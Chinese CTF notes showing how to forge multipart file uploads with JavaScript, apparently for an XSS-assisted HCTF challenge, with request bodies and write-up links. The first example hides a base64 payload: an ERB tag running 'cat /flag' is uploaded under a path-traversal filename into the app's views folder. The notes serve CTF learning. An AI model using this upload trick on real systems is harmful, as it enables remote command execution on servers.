1.用h5对象上传表单(图片)
var formData = new FormData(); formData.append("authenticity_token", '1212121212'); formData.append("file[context]", "zxcvxzcvxzcv"); var content = 'PCU9IGBjYXQgL2ZsYWcgYCAlPg=='; //这是文件内容的base64 var blob = new Blob([content], { type: "image/png"}); formData.append("file[myfile]", blob,"Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi"); //这里是文件名的base64 formData.append("commit", 'submit'); var request = new XMLHttpRequest(); request.open("POST", "https://xz.aliyun.com/t/3245"); request.send(formData);
请求体
------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-Disposition: form-data; name="authenticity_token" 1212121212 ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-Disposition: form-data; name="file[context]" zxcvxzcvxzcv ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-Disposition: form-data; name="file[myfile]"; filename="Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi" Content-Type: image/png PCU9IGBjYXQgL2ZsYWcgYCAlPg== ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2 Content-Disposition: form-data; name="commit" submit ------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2--
1.用h5对象上传表单(txt)
var formData = new FormData(); var content = 'testestestes'; //这是文件内容的base64 var blob = new Blob([content], { type: "text/plain"}); formData.append("file[myfile]", blob,"haha.txt"); //这里是文件名的base64 formData.append("commit", 'submit'); var request = new XMLHttpRequest(); request.open("POST", "https://xz.aliyun.com/t/3245"); request.send(formData);
请求体
------WebKitFormBoundaryFcFYtbPnXsiq8yjI Content-Disposition: form-data; name="file[myfile]"; filename="haha.txt" Content-Type: text/plain testestestes ------WebKitFormBoundaryFcFYtbPnXsiq8yjI Content-Disposition: form-data; name="commit" submit ------WebKitFormBoundaryFcFYtbPnXsiq8yjI--
2.使用原生js上传表单数据
通过余弦这个网站辅助生成表单
xhr = function(){ /*AJAX*/ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { try { request = new window.ActiveXObject('Microsoft.XMLHTTP'); } catch(e) {} } return request; }(); request = function(method,src,argv,content_type){ xhr.open(method,src,false); if(method=='POST')xhr.setRequestHeader('Content-Type',content_type); xhr.send(argv); return xhr.responseText; } attack_a = function(){ var src = "https://xz.aliyun.com"; var authenticity_token = "1212121212"; var file = "zxcvxzcvxzcv"; var argv_0 = " "; argv_0 += "---------------------7964f8dddeb95fc5 Content-Disposition: form-data; name="authenticity_token" "; argv_0 += (authenticity_token+" "); argv_0 += "---------------------7964f8dddeb95fc5 Content-Disposition: form-data; name="file" "; argv_0 += (file+" "); argv_0 += "---------------------7964f8dddeb95fc5-- "; request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5"); }
请求体:
---------------------7964f8dddeb95fc5 Content-Disposition: form-data; name="authenticity_token" 1212121212 ---------------------7964f8dddeb95fc5 Content-Disposition: form-data; name="file" zxcvxzcvxzcv ---------------------7964f8dddeb95fc5--
HCTF share的详解ajax构造表单:
https://xz.aliyun.com/t/3258 xss上传表单
http://sec2hack.com/ctf/sctf2018-web-writeup.html xss获取源码
https://xz.aliyun.com/t/2469#toc-1巅峰极客wp,xss获取图片